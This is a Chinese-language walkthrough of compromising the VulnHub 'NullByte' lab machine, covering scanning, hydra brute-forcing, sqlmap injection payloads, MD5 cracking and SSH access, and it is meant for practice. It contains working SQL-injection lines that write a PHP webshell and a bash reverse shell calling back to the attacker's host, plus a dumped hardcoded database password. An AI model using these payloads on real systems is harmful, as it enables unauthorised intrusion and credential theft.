Nullbyte

nmap四扫结果

  • tcp详细扫:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──(kali㉿kali)-[/1-20/Nullbyte]
└─$ sudo nmap -sT -sV -sC -O -p80,111,777,46988 192.168.59.133 -oA nmapscan/tcpdetails
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-17 21:24 EDT
Nmap scan report for 192.168.59.133
Host is up (0.00076s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35043/tcp6  status
|   100024  1          37122/udp   status
|   100024  1          46988/tcp   status
|_  100024  1          49400/udp6  status
777/tcp   open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
|   2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
|   256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
|_  256 bc:f7:44:8d:79:6a:19:48:76:a3:e2:44:92:dc:13:a2 (ED25519)
46988/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:B8:11:D5 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.76 seconds

80端口的web服务优先尝试,rpc和ssh优先级靠后些

  • udp全端口:

  • tcp漏扫:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
┌──(kali㉿kali)-[/1-20/Nullbyte]                                                                                                                                                      
└─$ sudo nmap --script=vuln -p 80,111,777,46988 192.168.59.133 -oA nmapscan/tcpvuln                                                                                                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-17 21:25 EDT                                                                                                                    
Pre-scan script results:                                                                                                                                                              
| broadcast-avahi-dos:                       
|   Discovered hosts:                        
|     224.0.0.251                            
|   After NULL UDP avahi packet DoS (CVE-2011-1002).                                       
|_  Hosts are all up (not vulnerable).       
Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan                 
NSE Timing: About 93.39% done; ETC: 21:26 (0:00:00 remaining)                              
Stats: 0:04:45 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan                 
NSE Timing: About 99.21% done; ETC: 21:30 (0:00:02 remaining)                              
Nmap scan report for 192.168.59.133          
Host is up (0.00060s latency).               

PORT      STATE SERVICE                      
80/tcp    open  http                         
|_http-csrf: Couldn't find any CSRF vulnerabilities.                                       
|_http-dombased-xss: Couldn't find any DOM based XSS.                                      
| http-slowloris-check:                      
|   VULNERABLE:                              
|   Slowloris DOS attack                     
|     State: LIKELY VULNERABLE               
|     IDs:  CVE:CVE-2007-6750                
|       Slowloris tries to keep many connections to the target web server open and hold    
|       them open as long as possible.  It accomplishes this by opening connections to     
|       the target web server and sending a partial request. By doing so, it starves       
|       the http server's resources causing Denial Of Service.                             
|                                            
|     Disclosure date: 2009-09-17            
|     References:                            
|       http://ha.ckers.org/slowloris/       
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750                       
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.                           
| http-enum:                                 
|   /phpmyadmin/: phpMyAdmin                 
|_  /uploads/: Potentially interesting folder                                              
111/tcp   open  rpcbind                      
777/tcp   open  multiling-http               
46988/tcp open  unknown                      
MAC Address: 00:0C:29:B8:11:D5 (VMware)

漏扫没有太多有价值的信息,就80端口初步探测到了两个有价值的目录,且gobuster目录爆破结果表明除了javascript与上述外没有更多额外有价值目录,可以先尝试访问下,其中phpmyadmin和数据库有关,upload如果能访问到,对文件上传漏洞利用有帮助

web渗透

访问网站出现提示: 2024-06-18-09-42-01 按提示搜索了解这个法则,大致看了看,暂时没有明白什么意思。 尝试访问下nmap扫到的目录: 2024-06-18-09-59-16 不允许访问 2024-06-18-09-59-43 是phpmyadmin的后台登录页面,先尝试用默认凭据(root:空密码)登录: 2024-06-18-10-02-13 尝试万能密码也无果,由于爆破可能会触发某些密码策略机制以及时间成本故暂不考虑,接下来尝试先用sqlmap跑,首先随便输入账号密码,burp抓包,将该请求包内容均复制,分别在用户名密码对应字段值末尾添加*指定为可能存在注入的参数,然后保存为一个文本文件req1.txt,结果用sqlmap跑后尝试多种方案都没有结果,猜测是有做了一些较特殊的防护。 (PS: 到这里基本卡了有一阵子,多次尝试,综合获取到的信息没有找到什么有价值的信息,因此稍微看了下靶机精讲视频前部分)

(视频提示)尝试挖掘图片隐写信息

看了视频发现我遗漏了很关键的信息,就是网站出现的图片,出现图片应该考虑是否存在信息隐写的情况!因此,下载图片到本地,先分别用file(主要用来确认文件格式类型)和exiftool(不仅仅是图片,只要是下载后的文件都可以用该命令先查看文件的元数据信息)查看:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(kali㉿kali)-[/1-20/Nullbyte]
└─$ file level1.gif 
level1.gif: GIF image data, version 89a, 235 x 302

┌──(kali㉿kali)-[/1-20/Nullbyte]
└─$ exiftool level1.gif 
ExifTool Version Number         : 12.67
File Name                       : level1.gif
Directory                       : .
File Size                       : 17 kB
File Modification Date/Time     : 2024:06:18 00:56:13-04:00
File Access Date/Time           : 2024:06:18 01:28:42-04:00
File Inode Change Date/Time     : 2024:06:18 00:57:07-04:00
File Permissions                : -rw-r--r--
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 235
Image Height                    : 302
Has Color Map                   : No
Color Resolution Depth          : 8
Bits Per Pixel                  : 1
Background Color                : 0
Comment                         : P-): kzMb5nVYJw
Image Size                      : 235x302
Megapixels                      : 0.071

注意到Comment字段值中包含一段字符串,猜测很有可能是密码或者其他敏感信息,综合搜集到的信息,可以依次将其(先取后半部分,因为前半部分看起来像笑脸,作为密码可能性不大,无果后再尝试)作为phpadmin后台密码、ssh的root密码来尝试,尝试后无果。 还要联想到这类信息如果不是凭据还可能是敏感目录名敏感文件名,尝试后成功找到: 2024-06-18-13-38-31 查看源码: 2024-06-18-13-38-55 提示说这个表单不和后端数据库做交互,且这里的key也不是复杂密码,那很显然这就是在告诉我们可以尝试爆破表单值

尝试用hydra爆破表单值

确定了需求,可以谷歌搜索看看有没有什么解决方案: 2024-06-18-14-05-25 最终定位到这篇文章 文章表明可以用hydra爆破表单并举例子详细说明了用法。 F12-网络,随便输入key然后ctrl+R,捕获到该请求包,发现表单提交时是post请求,并且刚刚输入的key值在payload中也显示出来: 2024-06-18-14-14-45 2024-06-18-14-14-51 结合页面给的报错提示,至此可以尝试构造hydra了:

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[/1-20/Nullbyte]
└─$ sudo hydra -l none -P /usr/share/wordlists/rockyou.txt 192.168.59.133 http-post-form "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -V
。。。
[ATTEMPT] target 192.168.59.133 - login "none" - pass "destination" - 25255 of 14344399 [child 2] (0/0)
[ATTEMPT] target 192.168.59.133 - login "none" - pass "deathangel" - 25256 of 14344399 [child 5] (0/0)
[ATTEMPT] target 192.168.59.133 - login "none" - pass "dale88" - 25257 of 14344399 [child 7] (0/0)
[80][http-post-form] host: 192.168.59.133   login: none   password: elite
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-18 02:41:26

虽然这里的情况和文章示例有些差异,把key当作password来构造命令就行,但是用户名也要指定,虽然这里没有用户名的表单项,但不指定hydra会报错。最终爆破出了key值为elite。输入后进入另一表单页面,看功能是通过输入用户名来获取用户对应的信息: 2024-06-18-14-44-41 并且注意到请求是get的方式,这里的功能显然很可能就是和后台数据库做交互了,从后端数据库查询数据再返回给前端,因此可以尝试sql注入

sql注入

老规矩还是先用sqlmap扫:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(kali㉿kali)-[/1-20/Nullbyte]
└─$ sudo sqlmap -u http://192.168.59.133/kzMb5nVYJw/420search.php?usrtosearch=root -v 4
。。。
[02:50:28] [DEBUG] setting the HTTP User-Agent header
[02:50:28] [DEBUG] creating HTTP requests opener object
[02:50:29] [INFO] resuming back-end DBMS 'mysql' 
[02:50:29] [INFO] testing connection to the target URL
[02:50:29] [TRAFFIC OUT] HTTP request [#1]:
GET /kzMb5nVYJw/420search.php?usrtosearch=root HTTP/1.1
Cache-Control: no-cache
User-Agent: sqlmap/1.8.5#stable (https://sqlmap.org)
Host: 192.168.59.133
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close

[02:50:29] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: usrtosearch (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: usrtosearch=root" OR NOT 9840=9840#
    Vector: OR NOT [INFERENCE]#

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: usrtosearch=root" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71766b6a71,(SELECT (ELT(9245=9245,1))),0x716b787071,0x78))s), 8446744073709551610, 8446744073709551610)))-- Izlj
    Vector: AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: usrtosearch=root" AND (SELECT 5073 FROM (SELECT(SLEEP(5)))UCBe)-- rtZt
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: usrtosearch=root" UNION ALL SELECT NULL,CONCAT(0x71766b6a71,0x4a70655477626d50744d596279654e4f4c6947436b685755734b475668684562626d5652594f5245,0x716b787071),NULL#
    Vector:  UNION ALL SELECT NULL,[QUERY],NULL#
---
[02:50:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.5
[02:50:29] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.59.133'

[*] ending @ 02:50:29 /2024-06-18/

很快扫到并给出了payload,然后接下来就可以做sql注入中的信息搜集与爆库爆表等了:

  • 当前数据库banner信息(版本号):
1
2
3
4
5
[03:59:35] [DEBUG] performed 1 query in 0.03 seconds
web server operating system: Linux Debian 8 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.5
banner: '5.5.44-0+deb8u1'
  • 当前数据库名:
1
[02:55:24] [DEBUG] performed 1 query in 0.03 seconds                                                    current database: 'seth'
  • 当前用户:
1
2
[02:58:26] [DEBUG] performed 1 query in 0.04 seconds
current user: 'root@localhost'

当前用户就是root了,运气很好

  • 所有数据库:
1
2
3
4
5
6
7
8
[03:04:25] [DEBUG] performed 1 query in 0.03 seconds
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth

  • seth库中所有表:
1
2
3
4
5
6
[03:06:13] [DEBUG] performed 2 queries in 0.28 seconds
Database: seth
[1 table]
+-------+
| users |
+-------+
  • seth库中users表的所有列:
1
2
3
4
5
6
7
8
9
10
11
12
[03:13:53] [DEBUG] performed 2 queries in 0.06 seconds
Database: seth
Table: users
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| position | text        |
| user     | text        |
| id       | smallint(6) |
| pass     | text        |
+----------+-------------+
  • seth库的所有用户名与密码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
[03:25:55] [DEBUG] performed 2 queries in 0.05 seconds
[03:25:55] [DEBUG] analyzing table dump for possible password hashes
Database: seth
Table: users
[2 entries]
+--------+
| user   |
+--------+
| isis   |
| ramses |
+--------+

[03:25:55] [INFO] table 'seth.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.59.133/dump/seth/users.csv'

[03:27:09] [DEBUG] performed 3 queries in 0.06 seconds
[03:27:09] [DEBUG] analyzing table dump for possible password hashes
Database: seth
Table: users
[2 entries]
+---------------------------------------------+
| pass                                        |
+---------------------------------------------+
| YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE |
| --not allowed-- |
+---------------------------------------------+

[03:27:09] [INFO] table 'seth.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.59.133/dump/seth/users.csv'

然后还有个phpmyadmin库中的信息也需要搜集一下:

  • phpmyadmin库的所有表:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
[03:30:16] [DEBUG] performed 2 queries in 0.07 seconds
Database: phpmyadmin
[17 tables]
+-----------------------+
| pma__bookmark         |
| pma__column_info      |
| pma__designer_coords  |
| pma__favorite         |
| pma__history          |
| pma__navigationhiding |
| pma__pdf_pages        |
| pma__recent           |
| pma__relation         |
| pma__savedsearches    |
| pma__table_coords     |
| pma__table_info       |
| pma__table_uiprefs    |
| pma__tracking         |
| pma__userconfig       |
| pma__usergroups       |
| pma__users            |
+-----------------------+
  • phpmyadmin库中表pma__users的所有列:
1
2
3
4
5
6
7
8
9
10
[03:31:49] [DEBUG] performed 2 queries in 0.05 seconds
Database: phpmyadmin
Table: pma__users
[2 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| usergroup | varchar(64) |
| username  | varchar(64) |
+-----------+-------------+
  • phpmyadmin库中表pma__users的所有数据: 然而并没有结果显示,尝试其他表后也没有发现什么有价值信息 综上获取到的信息,下一步就是破解hash,然后尝试登录ssh等

hashcat破解mysql数据库密码hash【失败尝试】

在破解之前最好先识别一下hash所用的加密算法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[/1-20/Nullbyte]
└─$ hash-identifier                                            
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE

 Not Found.

识别不出来,尝试直接用hashcat自动识别并破解,由于尝试用linux破解速度太慢,故尝试用带有显卡A卡支持的windows破解, 在破解之前,先用-b选项对当前显卡破解能力进行hashcat自测(基准测试hashcat破解各种密码hash的速度,同时检查GPU和相应的显卡驱动):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
F:\sectools\hashcat-6.2.6>hashcat.exe -b
hashcat (v6.2.6) starting in benchmark mode
。。。
--------------------------------------------------------
* Hash-Mode 7500 (Kerberos 5, etype 23, AS-REQ Pre-Auth)
--------------------------------------------------------

* Device #3: ATTENTION! OpenCL kernel self-test failed.

Your device driver installation is probably broken.
See also: https://hashcat.net/faq/wrongdriver

Speed.#1.........:   618.6 MH/s (80.89ms) @ Accel:256 Loops:256 Thr:32 Vec:1
Speed.#3.........:  3820.2 kH/s (67.10ms) @ Accel:2 Loops:1024 Thr:8 Vec:4
Speed.#*.........:   622.4 MH/s

(待完善)解决windows使用hashcat中显卡模式破解时的问题

很快便检测到了问题,打开上面官方url后,官方解决步骤如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
Windows specific steps:

1.Completely uninstall the current driver (use Windows Software Center)
2.Reboot
3.Recommended: Download and start Driver Fusion (free version is enough; select “Display”, AMD/NVidia/Intel, ignore the warning about Premium version)
4.Reboot
5.Make sure that no Intel OpenCL SDK, AMD-APP-SDK or CUDA-SDK framework is installed – if it is installed, uninstall it!
6.Manually delete remaining OpenCL.dll, OpenCL32.dll, OpenCL64.dll files on all folders. You should find at least 2. They usually reside in “c:\windows\syswow64” and “c:\windows\system32”. This step is very important!
7.Reboot
8.Install the driver recommended on https://hashcat.net/hashcat/. If it says “exact”, it means exact.
9.Reboot
10.Reinstall hashcat - choose:
    Stable version: Download and extract the newest hashcat from https://hashcat.net/
    Beta version: https://hashcat.net/beta/
    Development version: git clone https://github.com/hashcat/hashcat
11.Try to run hashcat --benchmark
------------------------------------------------------
Linux specific steps:

1.Completely uninstall the current driver
    NVIDIA: nvidia-uninstall
    AMD: amdconfig --uninstall=force
    If you installed the driver via a package manager, remove those packages
    Make sure to purge those packages, not just uninstall them
2.Reboot
3.Make sure that no Intel OpenCL SDK, AMD-APP-SDK or CUDA-SDK framework is installed – if it is installed, uninstall it!
4.Find all packages installed that provide a libOpenCL, then purge them:
    dpkg -S libOpenCL
    find / -name libOpenCL\* -print0 | xargs -0 rm -rf
5.Reboot
6.apt-get install ocl-icd-libopencl1 opencl-headers clinfo
7.Install the driver recommended on https://hashcat.net/hashcat/. If it says “exact”, it means exact.
For AMD GPUs on Linux, see ROCm instructions here.
8.Reboot
9.rm -rf ~/.hashcat/kernels
10.Reinstall hashcat - choose:
    Stable version: Download and extract (use “7z x” to extract) the newest hashcat from https://hashcat.net/
    Beta version: https://hashcat.net/beta/
    Development version: git clone https://github.com/hashcat/hashcat
11.Try to run clinfo first in your terminal
12.Try to run hashcat --benchmark

首先,卸载n卡的图形驱动程序: 2024-06-19-11-34-23 然后重启。

安装Driver Fusion免费版并打开,然后健康检查-检查问题,扫描后,检索nvidia,依次点击修复此问题 2024-06-19-11-47-53 然而需要专业版才能使用该功能,这就不得不去寻找破解版,虽然安全性无法保证,但评估风险后依然决定继续安装,然而尝试多次破解版的无法打开,因此只能试图寻找其他同类可替代软件,最终找到了这个 然后扫描,自动更新并安装驱动即可: 2024-06-19-13-10-09 安装后重启。

然后根据第5步删除相应SDK,再根据第6步手动搜索并删掉两个目录下的与opencl相关的三个dll,权限不够可以用360等自带的强力删除,继续重启。这两步是最重要的。

至此,先重新打开hashcat的自测模式看看都会遇到哪些报错:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
F:\sectools\hashcat-6.2.6>hashcat.exe -b
hashcat (v6.2.6) starting in benchmark mode

Benchmarking uses hand-optimized kernel code by default.
You can use it in your cracking session by setting the -O option.
Note: Using optimized kernel code limits the maximum supported password length.
To disable the optimized kernel code in benchmark mode, use the -w option.

ATTENTION! No OpenCL, Metal, HIP or CUDA installation found.

You are probably missing the CUDA, HIP or OpenCL runtime installation.

* AMD GPUs on Windows require this driver:
  "AMD Adrenalin Edition" (Adrenalin 22.5.1 exactly)
* Intel CPUs require this runtime:
  "OpenCL Runtime for Intel Core and Intel Xeon Processors" (16.1.1 or later)
* NVIDIA GPUs require this runtime and/or driver (both):
  "NVIDIA Driver" (440.64 or later)
  "CUDA Toolkit" (9.0 or later)

重新查看官方提到的GPU驱动需要的版本要求: 2024-06-19-13-47-51 两者是对应上的,首先可以通过nvidia控制面板的房子图标查看当前nvidia驱动版本: 2024-06-19-13-58-54 然后重新安装cuda,全选默认

然而运行时可能依然有报错:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
F:\sectools\hashcat-6.2.6>hashcat.exe -a 3 -D 2 ..\hashes.hash ..\wordlists\rockyou.txt -t 1000

hashcat (v6.2.6) starting in autodetect mode

Successfully initialized the NVIDIA main driver CUDA runtime library.

Failed to initialize NVIDIA RTC library.

* Device #1: CUDA SDK Toolkit not installed or incorrectly installed.
             CUDA SDK Toolkit required for proper device support and utilization.
             Falling back to OpenCL runtime.

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

OpenCL API (OpenCL 3.0 CUDA 12.4.131) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #1: NVIDIA GeForce RTX 4060 Laptop GPU, 8064/8187 MB (2046 MB allocatable), 24MCU

OpenCL API (OpenCL 3.0 ) - Platform #2 [Intel(R) Corporation]
=============================================================
* Device #2: Intel(R) UHD Graphics 770, 15072/30220 MB (2047 MB allocatable), 16MCU

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

5700 | Cisco-IOS type 4 (SHA256) | Operating System

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

出现了以下问题报错:

  • 问题1 Failed to initialize NVIDIA RTC library.
  • 问题2 WARNING! Kernel exec timeout is not disabled.
  • 问题3 nvmlDeviceGetFanSpeed(): Not Supported

通过搜索,解决如下: 对于问题1,在官网选择好对应平台安装cuda,然后重启电脑,再次运行hashcat后该报错已消失。(前面如果正确安装好了cuda一般就不会出现这个问题)

对于问题2,对于win11和win10解决方案不同,win11需管理员身份打开Nsight Monitor,注意该软件默认使用端口8000,如果报错出现端口占用,在任务栏中,右击该软件对应图标,选择Options,即可修改: 2024-06-19-10-40-13 重启软件。然后依然是该选项设置中,将WDDM TDR Enabled改成False,然后重启电脑。

  • 产生这一报错的原因: 在使用极端性能设置运行hashcat时,用户可能会遇到崩溃,然后通过驱动程序重置自动恢复GPU。这是由于内核运行时超过2秒限制造成的。此功能对于防止屏幕冻结很有用,但对于hash破解没有用处。
  • 解决该报错的流程意义: 此操作是为了禁用TDR; TDR(超时检测和恢复)功能。TDR是Windows Vista之后的版本引入的一种机制,用于检测和恢复显卡驱动程序的停止响应问题。如果操作系统在一定时间内没有收到显卡的响应,就会触发TDR,重置显卡,并显示“显卡驱动程序已停止响应,并且已恢复”的提示。

注意:禁用TDR功能可能会导致系统不稳定或无法恢复显卡问题。这种方法只适合在开发或测试过程中使用,并不推荐普通用户使用。

对于问题3,经过搜索后表明这不是hashcat的错误,并且影响不大可以忽略

重新启动并运行后,虽然能破解但发现完全无法发挥GPU所有性能,甚至比在linux上破解时还要慢,出现新的问题:

  • 问题4
1
2
3
4
5
6
The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.

PS:然而解决了上述破解遇到的问题后,最终还是没有破解出来,卡了至少有一天。

(视频提示)加密字符串重新识别与john/hashcat破解mysql数据库密码hash

看了视频才发现,原来我破解的对象就错了,我破解的是真正的hash值经过base64加密后的,因此刚开始hash-identifier很快就输出识别不了;而视频中是先对加密字符串进行base64解码后再破解,这里反思到是我对常见加密与哈希值的识别经验不足。正确步骤如下:

1
2
3
4
┌──(kali㉿kali)-[~/Desktop/redteamnotes_benchmark_1-20/vulnhub/Nullbyte]
└─$ echo -n YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | base64 -d    
c6d6bd7ebf806f43c76acc3681703b81base64: invalid input

此时,c6d6bd7ebf806f43c76acc3681703b81才是真正的hash值! 识别hash算法:

1
2
3
4
 HASH: c6d6bd7ebf806f43c76acc3681703b81                          
Possible Hashs:                                            
[+] MD5                                                     
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

表明是MD5类型算法。

用john破解该hash值:

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/Desktop/redteamnotes_benchmark_1-20/vulnhub/Nullbyte]
└─$ john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt md5_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
omega            (?)     
1g 0:00:00:00 DONE (2024-06-19 03:15) 100.0g/s 1152Kp/s 1152Kc/s 1152KC/s verbatim..snuffy
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

用linux的hashcat同样也很快破解出:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali㉿kali)-[~/Desktop/redteamnotes_benchmark_1-20/vulnhub/Nullbyte] 
└─$ sudo hashcat -m 0 -a 0 md5_hash /usr/share/wordlists/rockyou.txt
。。。
c6d6bd7ebf806f43c76acc3681703b81:omega     
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: c6d6bd7ebf806f43c76acc3681703b81
Time.Started.....: Wed Jun 19 03:10:57 2024 (0 secs)
Time.Estimated...: Wed Jun 19 03:10:57 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1095.9 kH/s (0.54ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 12288/14344385 (0.09%)
Rejected.........: 0/12288 (0.00%)
Restore.Point....: 8192/14344385 (0.06%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: total90 -> hawkeye
Hardware.Mon.#1..: Util: 11%

并且发现之前-a参数也用错了,之前选的3是爆破模式,而0才是字典模式。

因此,得到密码omega,保存。

获取到立足点

结合已知服务密码碰撞

结合破解的密码和已知的两个用户,很显然接下来可以尝试密码碰撞,结合已知的服务, 即凭据:

1
2
3
root:omega
isis:omega
ramses:omega

最后通过ssh碰撞成功:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿kali)-[~/Desktop/redteamnotes_benchmark_1-20/vulnhub/Nullbyte]
└─$ ssh ramses@192.168.59.133 -p 777
ramses@192.168.59.133's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug  2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$ whoami
ramses

ramses@NullByte:~$ id 
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)

(视频补充部分)结合mysql文件手工写入简单一句话木马获取shell

视频中还提到了另一种获取立足点的方式,我发现我欠考虑了mysql的banner版本,由于版本5.5.44-0+deb8u15.7.6之前,故还可以利用mysql的文件读写功能来实现: 1" union select "<?php system($_GET['cvestone']); ?>",2,3 into outfile "/var/www/html/uploads/shell.php"; -- - 这里的uploads是之前目录爆破得到的 2024-06-19-16-19-48 尝试是否能访问到木马文件并执行简单命令: 2024-06-19-16-22-26 不过相比前面的方式此处获取到的shell权限较低。当然,也可以用哥斯拉等webshell管理器生成的木马,但同样要注意转义。

注意如果要通过此方式执行更多命令时,要记得对特殊字符做url编码后再执行

(视频补充部分)结合mysql文件手工写入大马反弹shell

前面利用小马拿到的shell交互性很有限,因此还可以尝试写入大马: 1" union select "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/192.168.59.131/1234 0>&1'\"); ?>",2,3 into outfile "/var/www/html/uploads/revshell.php"; -- -

关于这段大马的分析:

然后kali开启监听:

1
sudo nc -lvnp 1234

然后访问该大马后反弹成功: 2024-06-19-16-58-11

通过普通用户的shell泄露网站源码与数据库连接信息

虽然获取到的不是root权限用户,但普通用户权限完全可以尝试访问网站所在目录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
ramses@NullByte:/var/www/html$ ls
index.html  kzMb5nVYJw  main.gif  main.gif_original  uploads
ramses@NullByte:/var/www/html$ cd kzMb5nVYJw/
ramses@NullByte:/var/www/html/kzMb5nVYJw$ ls
420search.php  index.php
ramses@NullByte:/var/www/html/kzMb5nVYJw$ cat 420search.php 
<?php
$word = $_GET["usrtosearch"];

$dbhost = 'localhost:3036';
$dbuser = 'root';
$dbpass = 'sunnyvale';
$conn = mysql_connect($dbhost, $dbuser, $dbpass);
if(! $conn )
{
